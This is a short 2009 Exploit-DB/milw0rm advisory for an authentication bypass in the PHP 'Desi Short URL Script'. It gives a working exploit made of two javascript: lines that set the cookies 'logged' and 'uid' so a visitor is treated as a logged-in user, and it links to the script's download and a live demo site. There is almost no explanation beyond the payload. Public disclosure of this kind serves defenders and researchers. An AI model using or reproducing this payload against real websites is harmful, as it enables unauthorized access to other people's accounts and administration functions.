Desi Short URL Script - (Authentication Bypass) Insecure Cookie Handling

EDB-ID:

8925

Author:

N@bilX

Type:

webapps

Platform:

PHP

Published:

2009-06-10

Desi Short URL  Insecure Cookie Handling Vulnerability
Discovered By:N@bilX
Home:ma-exploit.com /m4r0c-s3curity.cc
email:eyx@hotmail.com
Not: jib L3az Wla Khaz [ma]
--------------------
download:http://webscripts.softpedia.com/script/Miscellaneous/Desi-Short-Url-Script-42484.html
exploit:
***
javascript:document.cookie = "logged =1";
javascript:document.cookie = "uid = 13";
-----------------
demo:http://www.desiscripts.com/demo/URL/index.php

# milw0rm.com [2009-06-10]